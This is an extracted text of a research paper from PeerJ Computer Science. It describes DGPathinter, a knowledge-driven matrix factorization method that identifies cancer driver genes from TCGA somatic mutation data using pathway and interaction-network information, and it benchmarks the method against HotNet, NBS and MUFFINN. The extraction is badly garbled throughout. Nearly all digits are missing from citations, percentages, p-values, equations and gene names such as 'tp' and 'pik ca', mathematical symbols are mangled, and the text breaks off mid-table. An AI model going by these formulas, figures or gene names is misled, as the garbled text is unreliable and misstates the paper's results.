http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ dees et al., ; lawrence et al., ; hua et al., ; cho et al., ). for this reason, distinguishing driver genes from genes with passenger mutations is a critical challenge for understanding genetic basis for cancer. at the same time, somatic mutations of genes in tumor samples can be efficiently detected by next generation sequencing technology (schuster, ; xiong et al., ; zhao et al., ), and enormous accumulated datasets of cancer genomic alterations have been provided by studies such as the cancer genome atlas (tcga) (weinstein et al., ) and the international cancer genome consortium (icgc) (hudson et al., ). these large-scale datasets of cancer genomics offer us an unprecedented opportunity to discover driver genes from the somatic mutation profiles of tumor samples (kandoth et al., ; lawrence et al., , ; tamborero et al., ). to address the driver and passenger problem, many efforts have been undertaken to catalogue genes by comparing the mutation frequencies of the tested genes with the background mutation rates (bmrs) through statistical analysis (dees et al., ; lawrence et al., ; hua et al., ; sjöblom et al., ; youn & simon, ). for example, a previous study has been adopted to identify genes with mutational significance by using a per-gene bmr (dees et al., ), and another research study on driver genes is based on utilizing information of coverage and other genomic features such as dna replication time to estimate the bmrs of genes (lawrence et al., ). furthermore, bayesian approaches are also applied to estimate bmrs in detecting driver genes (hua et al., ). in addition, some other studies are proposed to determine driver genes through the cancer mutation prevalence scores of genes in tumor samples (sjöblom et al., ) or the predicted impact on protein function and the mutational recurrence of genes (youn & simon, ). through these mutation frequency-based approaches, a number of statistically significantly potential driver genes have been identified (dees et al., ; lawrence et al., ; an et al., ). nevertheless, although some driver genes are mutated at high frequencies among tumor samples, previous studies have reported that some driver genes are mutated at low frequencies, and the mutation frequencies of these genes are too low to be tested as statistically significant (vandin, upfal & raphael, ; leiserson et al., ; raphael et al., ). a prevalent assumption to explain the long tail phenomenon is that genes usually interact with other genes, and some genes with no mutation can be perturbed by their interacting neighbors (vandin, upfal & raphael, ; leiserson et al., ; raphael et al., ; cho et al., ). based on this assumption, many studies for driver gene identification have been proposed by incorporating interactome information as prior knowledge (vandin, upfal & raphael, ; leiserson et al., ; raphael et al., ; hofree et al., ; bashashati et al., ; cho et al., ). the interactome information is employed as gene interaction network obtained from databases including irefindex (razick, magklaras & donaldson, ), string (szklarczyk et al., ) and others (prasad et al., ; lee et al., ; das & yu, ; khurana et al., ). for example, hotnet and hotnet use the idea of heat-diffusion and propagate the mutation frequency scores of genes through the network, and calculate the significance scores of genes to identify potential driver genes (vandin, upfal & raphael, ; leiserson et al., ). nbs is an integrated method that propagates the mutations through the xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interaction network for each tumor sample as preprocessing, and uses matrix factorization to obtain mutation-based subtypes and the mutation profiles of each subtypes (hofree et al., ), where the mutation profiles can be utilized to prioritize driver genes (hofree et al., ; shi, gao & wang, ). instead of using network propagation, muffinn prioritizes the genes by the mutational impact of their direct neighbors in the network context (cho et al., ). in addition, interaction network information has also been used to predict patient specific driver genes, which helps the personalized analysis (hou & ma, ; jia & zhao, ; bertrand et al., ). through the network-based approaches, many novel potential driver genes have been discovered, which greatly complements the understanding of cancer driver genes (leiserson et al., ; raphael et al., ; cho et al., ). however, knowledge from pathways is not exploited in the aforementioned driver gene identification approaches. since the operation of many pathways has been frequently reported to be altered in cancer progression (parsons et al., ; cancer genome atlas research network, ; vaske et al., ), the knowledge from pathways is also important for understanding the roles of genes in cancer and thus can conduct the identification of cancer driver genes. notably, some studies have cataloged pathway knowledge into publicly available databases, such as kegg (ogata et al., ), reactome (joshi-tope et al., ) and biocarta (nishimura, ), which have also been used to detect the perturbed pathways involved in the tested tumor samples in some previous efforts (subramanian et al., ; ng et al., ; li et al., ; ma et al., ). although the pathway information is used in these approaches, they are not designed to identify potential driver genes. meanwhile, the aforementioned driver gene detecting methods only use interactome information and not the pathway information. consequently, the already available knowledge from pathways remains an underexploited resource in the identification of potential driver genes, and there is a lack of an approach that can effectively integrate information from both interactome information and pathways as prior knowledge. in this article, we introduce driver gene identification through pathway and interactome information (dgpathinter), to discover potential driver genes from mutation data through a knowledge-based matrix factorization framework, where prior knowledge from pathways and interaction network is efficiently integrated. by maximizing the correlation between the relations of mutation scores of genes and the pathway scores (chen & zhang, ), we can identify potential driver genes driven by prior knowledge from pathways. at the same time, we also use a graph laplacian technique to adopt information from an interaction network in the identification of driver genes (xie, wang & tao, ). in addition, we use the framework of matrix factorization to integrate the information of mutation profiles, interactome and pathways, which is capable of factorizing the gene mutation scores from different sets of tumor samples and helps dgpathinter to address tumor sample heterogeneity issue (lee et al., ; sill et al., ; zhou et al., ; xi & li, ). compared with our previous approach (xi, li & wang, ), dgpathinter is a revised computational model with additional prior information incorporated. although both dgpathinter and the previous approach xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (xi, li & wang, ) utilize matrix factorization framework and network information, dgpathinter further considers the prior information of the pathway. in addition to driver gene identification, dgpathinter can provide highly scored pathways for the investigated tumor samples, while our previous approach could not. when we apply dgpathinter and three existing interactome driven methods on three tcga cancer datasets, the detection results of dgpathinter outperform those of the competing methods. the top ranked genes detected by dgpathinter are also highly enriched for known driver genes. we further investigate the top ranked scored pathways yielded by dgpathinter, demonstrating that most of these pathways are also associated with cancer progressions. the remainder of the paper is organized as follow: “materials and methods” introduces the rationales and detailed techniques of our method dgpathinter. in “results”, we apply our method on three cancer datasets and evaluate dgpathinter with the three existing methods through known driver genes. finally, we discuss our future work and make a brief conclusion in “discussion”. the code of dgpathinter can be freely accessed at https://github.com/ ustc-hilab/dgpathinter. materials and methods somatic mutation datasets for the somatic mutation data of cancers, we focus on three types of cancers from tcga datasets, which include tumors samples from breast invasive carcinoma (brca) (cancer genome atlas network, ), tumor samples from glioblastoma multiforme (gbm) (cancer genome atlas research network, ) and tumor samples from thyroid carcinoma (thca) (cancer genome atlas research network, ). the somatic mutation data are downloaded from cbioportal database (gao et al., ). the somatic mutation data are formed as a binary matrix (sample � gene) xn�p (bashashati et al., ; hofree et al., ; kim, sael & yu, ), where n is the number of samples and p is the number of the tested genes. an entry of the matrix being denotes a mutation occurs in the respective gene and tumor sample, when compared with the germline (bashashati et al., ; hofree et al., ; kim, sael & yu, ). the network information used in this study is irefindex (razick, magklaras & donaldson, ), a highly curated interaction network containing , nodes (genes) and , edges (interactions). for the pathway information, we follow previous studies (park et al., ) and use the curated pathways from three databases, kegg (ogata et al., ), reactome (joshi-tope et al., ) and biocarta (nishimura, ), which are also downloaded from the previous study (park et al., ). model of knowledge-driven matrix factorization to efficiently identify potential driver genes from somatic mutation data, we use a knowledge-driven matrix factorization framework, which can successfully integrated information from pathways and interaction networks. a brief overview of dgfathinter is illustrated in fig. . since many matrix factorization-based methods have been used for detecting abnormal genes from heterogeneous tumor samples (lee et al., ; sill et al., ; zhou et al., , ; xi & li, ; xi, li & wang, ), we introduce matrix xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/ustc-hilab/dgpathinter https://github.com/ustc-hilab/dgpathinter http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ s am pl e: n gene: p mutation matrix: x sample matrix: s gene matrix: g n x p n x k k x p t maximum mutation score for each genes prior information from pathway tr{g f v } p x m t m x k k x p prior information from interactome tr{g l g } p x p t p x k k x p relationship matrix: f (genes to pathways) pathway score matrix: v p x m m x k laplacian matrix of network: l p x p tp pten idh pik ca cdh akt map k braf kras figure a schematic diagram providing an overview of dgpathinter. in dgpathinter, we utilize prior knowledge from pathways and interactome information in our model. the two types of prior knowledge are integrated via a knowledge-driven matrix factorization framework. this matrix factor- ization framework also decompose the somatic mutation matrix as the multiplication of two low rank matrices sn�k = (s , : : : , sk) and g t k�p = (g , : : : , gk) t , which is equivalent to the summation of k rank- one layers pk i¼ ðsigti Þ. the matrix s is a binary matrix, of which the entries represent to the assignments of the samples to the rank-one layers. the entries of the matrix gt denote the gene mutation scores for the samples in the rank-one layers. to integrate the pathway information into the analysis workflow, we project the gene scores in the matrix g onto their related pathways and maximize the covariance between the projection scores and pathway scores -tr{gtfv}, where the bipartite matrix fp�m represents the relationships of the genes and the pathways, and the entries of the non-negative pathway score matrix vm�k represent the scores of the respective pathways and rank-one layers. meanwhile, to incorporate interactome information from an interaction network, we introduce a graph laplacian regularization term tr{gtlg} on the matrix g, where the matrix lp�p is the laplacian matrix of the interaction network. for each gene, we choose the maximal gene mutation scores among the k rank-one layers from the matrix g and prioritize the driver genes. the top ranked genes are regarded as potential driver genes for further evaluations. xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ factorization framework into dgpathinter. the matrix factorization-based methods factorize the data matrix as the multiplication of a low-rank sample matrix and a low-rank gene matrix (lee et al., ; sill et al., ; zhou et al., , ; xi & li, ; xi, li & wang, ), where the entries of the sample matrix indicate the assignments of different samples to different subsets and the entries of the gene matrix indicate the scores of the abnormal genes in the related subsets of samples. in our previous study (xi, li & wang, ), the matrix factorization framework has been shown to be an appropriate framework for the task of detecting driver genes from mutation data of heterogeneous cancers. here we denote the matrix gk�p = (g , : : : , gk) as the gene matrix and the binary matrix sn�k = (s , : : : , sk) as the sample matrix, and use their multiplication sg t to approximate the mutation matrix x. the entries of g represent the mutation scores of the tested genes related to the set of tumor samples indicated by the sample matrix s, which represent the assignments of the tested sample in different sample sets. here the number k is the rank of reconstruction matrix of the mutation matrix x. due to the constraint that the entries of matrix s are binary value, we use boolean constraint on matrix s (malioutov & malyutov, ), i.e., s ∘ (s - j) = , where the operator ∘ indicates hadamard product of two matrix, and the matrix j denotes an n�k matrix with all the entries being . the fitting problem of the multiplication of the two matrices s and g and the mutation matrix x can be formulate as x ≃ sgt + ε, where the ε is the residual matrix between the matrix x and the multiplication sgt, and matrix s is subject to the equality restriction s ∘ (s - j) = . by estimating the mutation scores of the tested genes in the matrix g from information of somatic mutation data, pathways and interaction network, we can identify the potential driver genes by ranking their mutation scores. the strategies of incorporating pathway and network information are present below. to make the driver gene prioritization procedure in our model driven by prior knowledge from pathways, we introduce a non-negative matrix vm�k as the pathway score matrix. the row number of the matrix m is total number of pathways used in our model. the column vectors in the matrix v = (v , : : : , vk) represent the scores of the pathways, and a higher score of a pathway indicates a larger potential that the pathway is dysregulated in the related set of tumor samples. to incorporate pathway information into gene scores for different sets of samples, we project the gene scores onto their related pathways and maximize the covariance between the projection scores and pathway scores as rc ¼� pk j¼ covðfgj; vjÞ¼�tr gtftv � � (chen & zhang, ), where the matrix v is subject to the inequality restriction v � . here the matrix fm�p represents the relationships of the tested genes and their related pathways. the entry fij equaling denotes that the jth gene belongs to the ith pathway. in addition, to avoid an overfitting problem, we also use frobenius norm-based regularization on the pathway scores v as rv ¼ vk k f (pan et al., ). furthermore, to integrate interaction network information into our model, we utilize laplacian regularization to encourage the smoothness between the scores of the interacted genes (xie, wang & tao, ). the regularization term is formulated as rl = tr{g tlg}, where the matrix l = d - a is the laplacian matrix of xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ interaction network, the matrix a is the adjacency matrix, and the matrix d is its corresponding degree matrix. consequently, we estimate the mutation scores of the tested genes in gene matrix g, pathway score matrix v and sample indicator matrix s by optimizing an optimization function of a knowledge-driven model with integrated data fitting and regularization terms formulated as: min s;g;v x �sgt �� �� f ��ctrfgtftvgþ �ltrfgtlggþ �v vk k f s:t:s�ðs� jÞ¼ ; v � ( ) where �c, �l and �v are used to balance the data fitting, the coherence gene scores and pathway scores according to their relations, the smoothness between scores of interacted genes and the regularization term of pathway scores. the tuning parameters �c, �v and �l are empirically set to . , . and . , respectively. we have also investigated the results of dgpathinter when the three parameters changes. for the three parameters, we can see that the detection results of the top genes show little variance when the tuning parameters are changed (figs. s –s ), demonstrating the robustness of our model with respect to these parameters. in fig. , we illustrate an overview of dgpathinter through schematic diagram. optimization of knowledge-driven matrix factorization due to the equivalence between the matrix multiplication sgt and the summation of multiple rank-one layers pk i¼ sig t i , we incorporate a layer-by-layer procedure to solve the optimization problem iteratively (lee et al., ; sill et al., ; xi & li, ). note that the first layer is the best rank-one estimation of the data matrix. we estimate the first layer by minimizing the following objective function min s ;g ;v x � s gt �� �� f ��ctrfgt ftv gþ �ltrfgt lg gþ �v v k k f s:t:s �ðs � nÞ¼ ; v � ; ( ) where s , g and v are the first column vectors of matrices s, g and v respectively, and n� indicate a vector with all coefficients being . the v t v is the inner product of vector v , which is equivalent to squared frobenius norm of the vector. we then apply an alternatively strategy to estimate the three vectors s , g and v in eq. ( ). when the other two vectors v and s are fixed, the minimization problem for the mutation score vector g can be reformulated as below: ming s k k gt g �ðxts Þg ��cðftv Þtg þ �lg t lg : ( ) through karush–kuhn–tucker (kkt) conditions, the mutation score vector g can be estimated as xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ g s k k ip þ�ll � �� xts þ�cftv � � ; ( ) where ip is a p�p identity matrix. likewise, the optimization function to solve the pathway score vector v in optimization problem in eq. ( ) is formulated as min v �v v t v ��cðfg Þtv s:t:v � ; ( ) which is a non-negative quadratic programming problem. the estimation of the vector v in eq. ( ) can be calculated as: v fð�c=�vÞfg gþ; ( ) where {·}+ is an operator which replace the negative coefficients of the input vector with zeros. for sample indicator vector s , the optimization function of eq. ( ) is formulated as a boolean constraint problem min g g �� �� st s �ðxg Þs s:t:s �ðs � nÞ¼ : ( ) through kkt conditions, the problem in eq. ( ) can be solved as: s i½ ;þ Þ � xg � g �� �� � ( ) where i� (z) is indicator function, of which the coefficients of the output vector are assigned to when the corresponding coefficients of input vector z belongs to the set �, and otherwise. consequently, the minimizing function is optimized by alternatively estimating the three vectors g , v and s in eqs. ( ), ( ) and ( ) until convergence (pseudo-code in table ). after convergence, the first rank-one layer s g t from the mutation matrix x, along with the related pathway score vector v , are obtained. since the cancer data may display heterogeneity, it is not sufficient to utilize only one layer to fit the mutation data matrix. subsequently, we apply the one layer estimation strategy aforementioned on the remaining samples to obtain the next layer. when the mutation matrix is factorized iteratively until no sample remains, we can obtain the rank number k automatically (lee et al., ; sill et al., ; xi & li, ). the multiple layers estimation yielded by our model can effectively incorporate information from the mutation matrix, the interaction network and pathways. experimental design and evaluation for the driver gene prioritization of our approach, we select the maximum entries of each row of gene matrix g as the score of the tested genes to be potential driver genes, which represent the intensities of the mutation of tested genes among different sets of xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ tumor samples. we then prioritize the investigated genes according to their mutation scores and select the top ranked genes as potential driver genes. due to the lack of gold standard for driver genes that are generally accepted, we further evaluate the detected genes via a list of known benchmarking cancer genes from a highly curated database, the network of cancer genes (ncg . ) (an et al., ). the ncg . gene list contains both experimentally supported cancer genes from the cancer gene census (cgc) (futreal et al., ) and statistical inferred candidate genes from previous studies (an et al., ). the cancer specific genes from the two benchmarking gene lists are used to assess the prioritizing results of the investigated methods. by using these benchmarking genes as ground truth genes in the evaluation studies, we firstly compute the precisions and recalls under different rank thresholds and draw precision–recall curves of the competing methods, where a curve closer to the top and right indicates a better performance (wu, hajirasouliha & raphael, ; yang et al., ). the precision is calculated as the fraction of selected genes that are also benchmarking genes, and the recall is computed as the fraction of benchmarking genes that are selected by the rank threshold. next, we calculate the average rank of known genes in the prioritization results to comprehensively assess the prioritization performance, which is a traditional metric for evaluating the performance of retrieval (ma & zhang, ; gargi & kasturi, ; müller et al., ). furthermore, we select the top genes from the results of the competing methods, and compare the proportions of known driver genes detected by the competing methods. fisher’s exact test is also applied on the results, which can evaluate whether the selected genes are significantly enriched for known driver genes by p values of the test. in addition, for the highly scored pathways given by our table pseudo-code of the first rank-one layer estimation of dgpathinter. algorithm dgpathinter: iterative estimation of the first rank-one layer input: soamtic mutation matrix xn�p; pathway by gene bipartite matrix fm�p; graph laplacian matrix of interaction network lp�p. output: sample indicator vector s (n� ); gene score vector g (p� ); pathway score vector v (m� ). : set �c : ; �v : ; �l : and t : s ð Þ n� , v ð Þ m� and g ð Þ nip þ�ll � �� xts ð Þ þ �cftv ð Þ � � : repeat : v ðtþ Þ fð�c=�vÞfg ðtÞ gþ : g ðtþ Þ s ðtÞ ��� ��� ip þ�ll � xts ðtÞ þ�cftv ðtþ Þ � � : s ðtþ Þ i½ ;þ Þ xg ðtþ Þ � g ðtþ Þ ��� ��� : t t þ : until convergence : return v vð Þ , g g ð Þ and s s ð Þ notes: n� is an n� vector with all coefficients being ; m� is an m� vector with all coefficients being . xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ approach, we also investigate whether these pathways are correlated with cancer progressions. results driver gene identification to evaluate the identification performance of dgpathinter, we compare our model with three existing methods, hotnet (leiserson et al., ), nbs (hofree et al., ) and muffinn (cho et al., ), on datasets of three types of cancers: brca, gbm and thca. in the performance evaluation, hotnet , nbs and muffinn are set to their default parameters. for muffinn, there are two versions (muffinn-dnmax and muffinn-dnsum) based on different strategies (cho et al., ), and we use both versions in the comparison study. the interactome information of all the investigated methods is the irefindex gene interaction network from razick, magklaras & donaldson ( ). the pathway information used in dgpathinter is from kegg, reactome and biocarta (ogata et al., ; joshi-tope et al., ; nishimura, ). in dgpathinter, the genes are ranked by their mutation scores from the matrix g. in the identification result of hotnet , a higher delta score of a gene indicates a larger potential of being driver genes (details in supplemental information). for nbs, the genes are sorted according to their scores in the nbs profiles. in muffinn, the prediction scores of genes for muffinn-dnmax and muffinn-dnsum are used to prioritize the genes. to give a comprehensive view of the identification performance, we analyze all the investigated genes by precision–recall curves and average ranks of known driver genes over the prioritization results. for the top ranked genes, we further compare the fractions of known benchmarking genes among the results of these methods, and their related p values of fisher’s exact test. venn diagrams of the top ranked genes among the competing methods are also analyzed. performance comparison the overall performance of dgpathinter, hotnet , nbs, muffinn-dnmax and muffinn-dnsum are illustrated as precision–recall curves in fig. . when we use the known benchmarking cancer genes in ncg . as a gold-standard, the precision–recall curves of dgpathinter are located over the other curves clearly for all the three types of cancers, indicating that dgpathinter yields the best identification performance among the four results on the datasets of the three types of cancers. taking brca result as an example, the precisions of dgpathinter, hotnet , nbs, muffinn-dnmax and muffinn-dnsum are . %, . %, . %, . % and . % respectively when the recalls of the results are fixed at . %. in the gbm results, the precisions of gbm-specific ncg . genes are . % for hotnet , . % for nbs, . % for muffinn-dnmax and . % for muffinn-dnsum when the recalls are . %. in comparison, dgpathinter achieves a precision of . % in the same situation. for the known experimental validated driver genes curated by cgc, we also draw the precision–recall curves of the four investigated results for the cgc gene list. in consistency with the ncg . results, xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a similar phenomenon can also be observed that the identification performance of our approach outperforms the results of the other competing methods (fig. s ). for example, dgpathinter gives a precision of . % on the brca data and . % on the gbm data when recalls are at . %, which are also higher than those of the other competing methods in the same situation. to assess whether and to which extent the difference between the performance of our method and previous approaches is statistically significant, we apply the non-parametric friedman test on the areas under the curve (aucs) of precision–recall curves among the three investigated cancers (table s ). the aucs for known ncg . and cgc genes yields p values of . and . , respectively, indicating that the difference between the performance of the investigated methods is statistically significant. we also evaluate average rank of the known cancer genes predicted by the investigated methods. for the ncg . gene list, dgpathinter yields average rank of . for known breast cancer specific genes, which is smaller than the those of . for hotnet , . for nbs, . for muffinn-dnmax, . for muffinn-dnsum (table ) and . for random selection. this result demonstrates that the benchmarking cancer genes in the result of our approaches are ranked much closer to the top in average, when compared recall . . . . p re ci si on . . . . brca dgpathinter hotnet nbs muffinn-dnmax muffinn-dnsum recall . . . . p re ci si on . . . . gbm dgpathinter hotnet nbs muffinn-dnmax muffinn-dnsum recall . . . . p re ci si on . . . . thca dgpathinter hotnet nbs muffinn-dnmax muffinn-dnsum a b c figure precision–recall curves of the prioritization results of the investigated methods for cancer specific known driver genes curated by ncg . (an et al., ) on (a) brca, (b) gbm and (c) hnsc datasets, where blue, dark green, light green, dark red and violet lines represent the curves of dgpathinter, hotnet , nbs, muffinn-dnmax and muffinn-dnsum, respectively. different points on a same curve represent the precisions and recalls at different thresholds of the results. table the average ranks of cancer specific known driver genes that are prioritized by the competing methods on brca, gbm and thca dataset. known driver genes list ncg . cgc method brca gbm thca brca gbm thca dgpathinter . . . . . hotnet . . . . . . nbs . . . . . muffinn-dnmax . . . . . . muffinn-dnsum . . . . . . random . . . . . . note: the evaluation cancer specific known driver genes are from ncg . (an et al., ) (left part of table) and cgc (futreal et al., ) (right part of table). xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with those of other three results. when we examine the cgc experimentally validated genes, our approach also yields the smallest average rank among the competing methods (table ). the average ranks for breast cancer specific cgc gene list are . , . , . , . , . and . for dgpathinter, hotnet , nbs, muffinn-dnmax, muffinn-dnsum and random selection, respectively. we also apply the non- parametric friedman test on the average ranks of known ncg . and cgc genes in the detection results of the competing methods, yielding p values of . and . respectively. the aforementioned investigations suggest that dgpathinter shows a promising capability for prioritizing known cancer genes than those of the other competing approaches. evaluation of top ranked genes for the top ranked genes, the top genes of the five prioritization results are selected for further evaluation. in brca result, the top genes for hotnet , nbs, muffinn- dnmax and muffinn-dnsum include , , and genes in ncg . list respectively. in contrast to the top genes for dgpathinter, there are genes matched in the ncg . benchmarking genes (fig. ). the p value of fisher’s exact tests on the result of the dgpathinter on brca is . – , indicating that the selected ncg . genes are significantly enriched for ncg . genes. for the gbm results, dgpathinter, hotnet , nbs, muffinn-dnmax and muffinn-dnsum identify , , , and ncg . genes, with related p values of . e- , . e- , . e- , . e- and . e- respectively. compared with the p values of the other identification results, dgpathinter yields the smallest p values among the competing results (fig. ). these results demonstrate that dgpathinter performs the best among these methods in detecting ncg . benchmarking cancer genes. furthermore, we investigate the numbers of selected top genes that are also cgc experimentally validated driver genes. for brca data, there are , , cgc driver genes detected by dgpathinter, hotnet and nbs, with # gene d g p at hi nt er h ot n et n b s m u ff in n -d n m ax m u ff in n -d n su m p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- brca # gene d g p at hi nt er h ot n et n b s m u ff in n -d n m ax m u ff in n -d n su m p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- gbm # gene d g p at hi nt er h ot n et n b s m u ff in n -d n m ax m u ff in n -d n su m p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- p= . e- thcaa b c figure bar plot of numbers of known cancer specific driver genes that are selected in the top genes among the competing prioritization results, for (a) brca, (b) gbm and (c) thca respectively. the dark blue bars represent the number of cgc genes (futreal et al., ), and the light blue bars represent the number of statistically inferred candidates genes in ncg . (including both cgc genes and statistically inferred genes) (an et al., ). the dark red texts at the top of the dark blue bars indicate the p values of fisher’s exact test on the selected genes for cancer specific cgc gene, while the dark green texts at the top of the light blue bars represent the p values for cancer-specific ncg . genes. xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ p values of . e- , . e- and . e- respectively. for gbm datasets, there are nine cgc genes captured by dgpathinter, of which the fisher’s exact test p value is . e- and is smaller than those of other investigated methods (eight cgc genes for hotnet with p value of . e- , six cgc genes for nbs with p value of . -e and one cgc gene for both muffinn-dnmax and muffinn-dnsum with p values of . e- ). for thca-specific driver genes detected by the competing methods, the ncg . genes completely overlap the cgc genes, and it can be observed that dgpathinter achieves the best performance among the competing methods. when we apply the friedman test on the proportions of known ncg . and cgc genes in the top genes detected by dgpathinter on the investigated cancers, we obtain p values of . and . respectively. we further change the number of top-ranked genes considered to see how the changes affect the results of the statistical test. for the proportions of known ncg . and cgc genes in the top genes of the results of the competing methods, the p values of friedman test are . and . respectively; for the top genes, the p values are . for known ncg . genes and . for known cgc genes. these results demonstrate that there is a statistically significant difference between the performance of the competing methods. furthermore, we compare the top genes among the five prioritization results and draw venn diagram of their results for three types of cancers respectively (fig. ). for brca dataset, genes identified by dgpathinter are also detected by at least of one of the other results. for example, gata gene is identified by dgpathinter, hotnet and nbs. as reported in a previous study (usary et al., ), variants in gata gene may have contribution to tumorigenesis in esr -positive breast cancers. another study also shows that gata mutations have the potential to be associated with aberrant nuclear localization, reduced transactivation and cell invasiveness in breast cancers (gaynor et al., ). for gbm dataset, there are totally genes shared in the detection dg pa thi nte r hotnet n b s muf fin n-d nma x m uffinn-dnsum dg pa thi nte r hotnet n b s muf fin n-d nma x m uffinn-dnsum dg pa thi nte r hotnet n b s muf fin n-d nma x m uffinn-dnsum brca gbm thca a b c figure venn diagrams of the top genes in the results of dgpathinter (blue circle), hotnet (dark green circle) and nbs (light green circle), muffinn-dnmax (dark red circle) and muffinn-dnmax (violet circle) on (a) brca, (b) gbm and (c) thca datasets. xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ results of dgpathinter, hotnet and nbs, including cgc curated gbm specific driver genes tp , pten, pik r , egfr and pik ca (futreal et al., ), and ncg . inferred gbm specific driver candidates erbb and rb (an et al., ). for thca dataset, hras is co-detected by dgpathinter, hotnet and nbs. although hras is not a thca specific driver gene curated by neither cgc nor ncg . , it is reported as driver gene for infrequent sarcomas and some other rare tumor types by cgc (futreal et al., ). moreover, some genes detected by dgpathinter are also captured by muffinn- dnmax or muffinn-dnsum. taking gbm results as an example, mdm gene is shared by the results of dgpathinter, muffinn-dnmax and muffinn-dnsum, which is reported to be the driver gene in bladder cancer, glioblastoma and retinoblastoma by cgc (futreal et al., ). the kras gene is identified by dgpathinter, hotnet and muffinn-dnsum, which is also a driver gene in several types of cancers reported by cgc (futreal et al., ). the flt gene is included in the results of dgpathinter, nbs and muffinn-dnsum, and is curated as a driver gene of soft tissue sarcoma by cgc (futreal et al., ). in addition to the genes shared by dgpathinter and other methods, there are also some genes unique to the results of dgpathinter. for example, tsh gene is a breast cancer driver gene curated by cgc, which is only detected by dgpathinter on the brca dataset. a number of cgc curated gbm specific driver genes, including akt , cdh , map k , ncor and tbx (futreal et al., ), are also unique to the results of dgpathinter on the gbm dataset. for the results of thca dataset, the cgc-curated thca specific driver gene tert is only identified by dgpathinter but not the other competing methods (futreal et al., ). the full lists of the top genes detected by dgpathinter on brca, gbm and tcha, along with the methods that co-detect them, are demonstrated in tables s –s , respectively. pathway analysis in addition to driver gene identification, dgpathinter can also provide highly scored pathways during the driver gene detection processing. we further analyze the top scored pathways in the results of dgpathinter, and find some well-known cancer related pathways such as p pathway, pten pathway, p mapk events pathway, atm pathway (table ). in the results of the brca dataset, the top one pathway is the gata pathway curated by the biocarta database, which is reported to be highly associated with breast cancer. for example, the gata pathway is reported to play an important role in reducing e-cadherin in breast cancer tissues (tu et al., ). meanwhile, the top ranked pathway in the gbm results is the rb pathway curated by biocarta, which is also found in the brca results. reported by previous studies (chow et al., ; sherr & mccormick, ), mutated rb pathway is one of the obligate events in the pathogenesis of glioblastomas. especially, thyroid cancer pathway is found in the results of dgpathinter on thca dataset, and glioma pathway is in the results on the gbm dataset. some other cancer-related pathways are also included in the lists of top ranked pathways, such as the gab signalosome pathway, the signaling to ras, the xi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ mtor signaling pathway, the non-small cell lung cancer pathway, the melanoma pathway, the pancreatic cancer pathway, the prostate cancer pathway, the bladder cancer pathway and the endometrial cancer pathway. table top scored pathways in the results of dgpathinter on somatic mutation datasets of brca, gbm and thca. rank brca gbm thca biocarta gata pathway biocarta rb pathway reactome shc mediated signalling biocarta rna pathway biocarta rna pathway reactome sos mediated signalling reactome gab signalosome biocarta arf pathway reactome p mapk events biocarta arf pathway biocarta tel pathway reactome grb events in egfr signaling biocarta trka pathway biocarta p pathway reactome signalling to p via rit and rin biocarta hcmv pathway biocarta ctcf pathway reactome shc related events biocarta rb pathway biocarta pml pathway biocarta vitcb pathway biocarta longevity pathway biocarta tid pathway reactome frs mediated activation biocarta ctcf pathway biocarta pten pathway reactome purine ribonucleoside monophosphate biosynthesis biocarta ach pathway reactome sema d induced cell migration and growth cone collapse biocarta il pathway biocarta gcr pathway biocarta p hypoxia pathway biocarta ace pathway biocarta gleevec pathway biocarta atrbrca pathway reactome tie signaling biocarta bcellsurvival pathway biocarta igf mtor pathway biocarta plateletapp pathway biocarta cdc rac pathway reactome gab signalosome reactome signalling to ras biocarta p pathway biocarta atm pathway kegg ether lipid metabolism biocarta il pathway biocarta g pathway kegg thyroid cancer biocarta rac pathway reactome sema d in semaphorin signaling biocarta ami pathway biocarta erk pathway biocarta g pathway reactome signalling to erks biocarta ctla pathway biocarta chemical pathway biocarta intrinsic pathway biocarta pten pathway kegg endometrial cancer kegg pentose phosphate pathway biocarta pml pathway biocarta mtor pathway reactome down stream signal transduction biocarta ngf pathway kegg bladder cancer reactome purine metabolism reactome tie signaling biocarta eif pathway biocarta bad pathway biocarta atm pathway kegg non small cell lung cancer kegg glycerophospholipid metabolism biocarta atrbrca pathway kegg glioma kegg bladder cancer biocarta tel pathway kegg melanoma kegg tyrosine metabolism biocarta tid pathway kegg pancreatic cancer kegg alanine aspartate and glutamate metabolism biocarta igf mtor pathway kegg prostate cancer kegg mtor signaling pathway reactome cd dependent pi k 